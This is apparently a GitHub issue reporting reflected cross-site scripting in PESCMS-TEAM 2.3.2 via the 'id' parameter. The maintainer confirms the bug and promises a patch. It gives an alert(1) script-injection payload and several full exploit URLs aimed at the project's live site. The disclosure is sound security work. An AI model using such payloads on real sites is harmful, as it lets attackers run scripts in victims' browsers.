### ISSUE TITLE
PECSM-TEAM 2.3.2 has multiple reflected Cross Site Scripting Vulnerability

### ISSUE THREAD

**Issue by icekam** [lazyphp/PESCMS-TEAM#6]
I found a reflective XSS vulnerability at: https://team.pescms.com/?g=Team&m=Task&a=my&status=233&id=

<img width="1093" alt="xss" src="https://user-images.githubusercontent.com/2880651/97874799-86259380-1d54-11eb-9440-fd16fc74259f.png">

now I input payload :"><ScRiPt>alert(1)</ScRiPt>

the full url is :https://team.pescms.com/?g=Team&m=Task&a=my&status=233&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

And many pages use id parameters, and they all reflect cross-site scripting vulnerabilities：

https://team.pescms.com/?g=Team&m=Task&a=my&status=3&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

https://team.pescms.com/?g=Team&m=Task&a=my&status=0&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

https://team.pescms.com/?g=Team&m=Task&a=my&status=1&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

https://team.pescms.com/?g=Team&m=Task&a=my&status=10&id=%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E

**Comment by lazyphp** [comment]
谢谢。这个问题复现成功。迟点我发布修复补丁。
